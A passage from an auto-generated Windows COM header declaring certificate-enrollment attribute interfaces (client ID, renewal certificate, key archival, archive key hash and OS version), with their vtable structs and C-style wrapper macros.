    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define IX509AttributeClientId_get_ClientId(This,pValue)	\
    ( (This)->lpVtbl -> get_ClientId(This,pValue) ) 

#define IX509AttributeClientId_get_MachineDnsName(This,pValue)	\
    ( (This)->lpVtbl -> get_MachineDnsName(This,pValue) ) 

#define IX509AttributeClientId_get_UserSamName(This,pValue)	\
    ( (This)->lpVtbl -> get_UserSamName(This,pValue) ) 

#define IX509AttributeClientId_get_ProcessName(This,pValue)	\
    ( (This)->lpVtbl -> get_ProcessName(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509AttributeClientId_INTERFACE_DEFINED__ */


#ifndef __IX509AttributeRenewalCertificate_INTERFACE_DEFINED__
#define __IX509AttributeRenewalCertificate_INTERFACE_DEFINED__

/* interface IX509AttributeRenewalCertificate */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509AttributeRenewalCertificate;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab326-217d-11da-b2a4-000e7bbb2b09")
    IX509AttributeRenewalCertificate : public IX509Attribute
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeEncode( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCert) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeDecode( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_RenewalCertificate( 
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509AttributeRenewalCertificateVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509AttributeRenewalCertificate * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509AttributeRenewalCertificate * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509AttributeRenewalCertificate * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509AttributeRenewalCertificate * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509AttributeRenewalCertificate * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509AttributeRenewalCertificate * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509AttributeRenewalCertificate * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509AttributeRenewalCertificate * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ObjectId )( 
            __RPC__in IX509AttributeRenewalCertificate * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509AttributeRenewalCertificate * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeEncode )( 
            __RPC__in IX509AttributeRenewalCertificate * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCert);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509AttributeRenewalCertificate * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RenewalCertificate )( 
            __RPC__in IX509AttributeRenewalCertificate * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } IX509AttributeRenewalCertificateVtbl;

    interface IX509AttributeRenewalCertificate
    {
        CONST_VTBL struct IX509AttributeRenewalCertificateVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509AttributeRenewalCertificate_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509AttributeRenewalCertificate_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509AttributeRenewalCertificate_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509AttributeRenewalCertificate_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509AttributeRenewalCertificate_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509AttributeRenewalCertificate_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509AttributeRenewalCertificate_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509AttributeRenewalCertificate_Initialize(This,pObjectId,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> Initialize(This,pObjectId,Encoding,strEncodedData) ) 

#define IX509AttributeRenewalCertificate_get_ObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_ObjectId(This,ppValue) ) 

#define IX509AttributeRenewalCertificate_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 


#define IX509AttributeRenewalCertificate_InitializeEncode(This,Encoding,strCert)	\
    ( (This)->lpVtbl -> InitializeEncode(This,Encoding,strCert) ) 

#define IX509AttributeRenewalCertificate_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define IX509AttributeRenewalCertificate_get_RenewalCertificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RenewalCertificate(This,Encoding,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509AttributeRenewalCertificate_INTERFACE_DEFINED__ */


#ifndef __IX509AttributeArchiveKey_INTERFACE_DEFINED__
#define __IX509AttributeArchiveKey_INTERFACE_DEFINED__

/* interface IX509AttributeArchiveKey */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509AttributeArchiveKey;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab327-217d-11da-b2a4-000e7bbb2b09")
    IX509AttributeArchiveKey : public IX509Attribute
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeEncode( 
            /* [in] */ __RPC__in_opt IX509PrivateKey *pKey,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCAXCert,
            /* [in] */ __RPC__in_opt IObjectId *pAlgorithm,
            /* [in] */ LONG EncryptionStrength) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeDecode( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_EncryptedKeyBlob( 
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_EncryptionAlgorithm( 
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_EncryptionStrength( 
            /* [retval][out] */ __RPC__out LONG *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509AttributeArchiveKeyVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509AttributeArchiveKey * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509AttributeArchiveKey * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509AttributeArchiveKey * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509AttributeArchiveKey * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509AttributeArchiveKey * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509AttributeArchiveKey * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509AttributeArchiveKey * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509AttributeArchiveKey * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ObjectId )( 
            __RPC__in IX509AttributeArchiveKey * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509AttributeArchiveKey * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeEncode )( 
            __RPC__in IX509AttributeArchiveKey * This,
            /* [in] */ __RPC__in_opt IX509PrivateKey *pKey,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCAXCert,
            /* [in] */ __RPC__in_opt IObjectId *pAlgorithm,
            /* [in] */ LONG EncryptionStrength);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509AttributeArchiveKey * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_EncryptedKeyBlob )( 
            __RPC__in IX509AttributeArchiveKey * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_EncryptionAlgorithm )( 
            __RPC__in IX509AttributeArchiveKey * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_EncryptionStrength )( 
            __RPC__in IX509AttributeArchiveKey * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        END_INTERFACE
    } IX509AttributeArchiveKeyVtbl;

    interface IX509AttributeArchiveKey
    {
        CONST_VTBL struct IX509AttributeArchiveKeyVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509AttributeArchiveKey_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509AttributeArchiveKey_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509AttributeArchiveKey_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509AttributeArchiveKey_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509AttributeArchiveKey_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509AttributeArchiveKey_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509AttributeArchiveKey_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509AttributeArchiveKey_Initialize(This,pObjectId,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> Initialize(This,pObjectId,Encoding,strEncodedData) ) 

#define IX509AttributeArchiveKey_get_ObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_ObjectId(This,ppValue) ) 

#define IX509AttributeArchiveKey_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 


#define IX509AttributeArchiveKey_InitializeEncode(This,pKey,Encoding,strCAXCert,pAlgorithm,EncryptionStrength)	\
    ( (This)->lpVtbl -> InitializeEncode(This,pKey,Encoding,strCAXCert,pAlgorithm,EncryptionStrength) ) 

#define IX509AttributeArchiveKey_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define IX509AttributeArchiveKey_get_EncryptedKeyBlob(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_EncryptedKeyBlob(This,Encoding,pValue) ) 

#define IX509AttributeArchiveKey_get_EncryptionAlgorithm(This,ppValue)	\
    ( (This)->lpVtbl -> get_EncryptionAlgorithm(This,ppValue) ) 

#define IX509AttributeArchiveKey_get_EncryptionStrength(This,pValue)	\
    ( (This)->lpVtbl -> get_EncryptionStrength(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509AttributeArchiveKey_INTERFACE_DEFINED__ */


#ifndef __IX509AttributeArchiveKeyHash_INTERFACE_DEFINED__
#define __IX509AttributeArchiveKeyHash_INTERFACE_DEFINED__

/* interface IX509AttributeArchiveKeyHash */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509AttributeArchiveKeyHash;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab328-217d-11da-b2a4-000e7bbb2b09")
    IX509AttributeArchiveKeyHash : public IX509Attribute
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeEncodeFromEncryptedKeyBlob( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncryptedKeyBlob) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeDecode( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_EncryptedKeyHashBlob( 
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509AttributeArchiveKeyHashVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509AttributeArchiveKeyHash * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509AttributeArchiveKeyHash * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509AttributeArchiveKeyHash * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509AttributeArchiveKeyHash * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509AttributeArchiveKeyHash * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509AttributeArchiveKeyHash * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509AttributeArchiveKeyHash * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509AttributeArchiveKeyHash * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ObjectId )( 
            __RPC__in IX509AttributeArchiveKeyHash * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509AttributeArchiveKeyHash * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeEncodeFromEncryptedKeyBlob )( 
            __RPC__in IX509AttributeArchiveKeyHash * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncryptedKeyBlob);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509AttributeArchiveKeyHash * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_EncryptedKeyHashBlob )( 
            __RPC__in IX509AttributeArchiveKeyHash * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } IX509AttributeArchiveKeyHashVtbl;

    interface IX509AttributeArchiveKeyHash
    {
        CONST_VTBL struct IX509AttributeArchiveKeyHashVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509AttributeArchiveKeyHash_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509AttributeArchiveKeyHash_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509AttributeArchiveKeyHash_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509AttributeArchiveKeyHash_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509AttributeArchiveKeyHash_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509AttributeArchiveKeyHash_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509AttributeArchiveKeyHash_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509AttributeArchiveKeyHash_Initialize(This,pObjectId,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> Initialize(This,pObjectId,Encoding,strEncodedData) ) 

#define IX509AttributeArchiveKeyHash_get_ObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_ObjectId(This,ppValue) ) 

#define IX509AttributeArchiveKeyHash_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 


#define IX509AttributeArchiveKeyHash_InitializeEncodeFromEncryptedKeyBlob(This,Encoding,strEncryptedKeyBlob)	\
    ( (This)->lpVtbl -> InitializeEncodeFromEncryptedKeyBlob(This,Encoding,strEncryptedKeyBlob) ) 

#define IX509AttributeArchiveKeyHash_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define IX509AttributeArchiveKeyHash_get_EncryptedKeyHashBlob(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_EncryptedKeyHashBlob(This,Encoding,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509AttributeArchiveKeyHash_INTERFACE_DEFINED__ */


#ifndef __IX509AttributeOSVersion_INTERFACE_DEFINED__
#define __IX509AttributeOSVersion_INTERFACE_DEFINED__

/* interface IX509AttributeOSVersion */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509AttributeOSVersion;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab32a-217d-11da-b2a4-000e7bbb2b09")
    IX509AttributeOSVersion : public IX509Attribute
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeEncode( 
            /* [in] */ __RPC__in BSTR strOSVersion) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeDecode( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_OSVersion( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509AttributeOSVersionVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509AttributeOSVersion * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509AttributeOSVersion * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509AttributeOSVersion * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509AttributeOSVersion * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509AttributeOSVersion * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509AttributeOSVersion * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509AttributeOSVersion * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509AttributeOSVersion * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ObjectId )( 
            __RPC__in IX509AttributeOSVersion * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509AttributeOSVersion * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeEncode )( 
            __RPC__in IX509AttributeOSVersion * This,
            /* [in] */ __RPC__in BSTR strOSVersion);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509AttributeOSVersion * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_OSVersion )( 
            __RPC__in IX509AttributeOSVersion * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } IX509AttributeOSVersionVtbl;

    interface IX509AttributeOSVersion
    {
        CONST_VTBL struct IX509AttributeOSVersionVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509AttributeOSVersion_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509AttributeOSVersion_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509AttributeOSVersion_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509AttributeOSVersion_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509AttributeOSVersion_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509AttributeOSVersion_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509AttributeOSVersion_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509AttributeOSVersion_Initialize(This,pObjectId,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> Initialize(This,pObjectId,Encoding,strEncodedData) ) 

#define IX509AttributeOSVersion_get_ObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_ObjectId(This,ppValue) ) 

#define IX509AttributeOSVersion_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 


#define IX509AttributeOSVersion_InitializeEncode(This,strOSVersion)	\
    ( (This)->lpVtbl -> InitializeEncode(This,strOSVersion) ) 

#define IX509AttributeOSVersion_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define IX509AttributeOSVersion_get_OSVersion(This,pValue)	\
    ( (This)->lpVtbl -> get_OSVersion(This,pValue) ) 

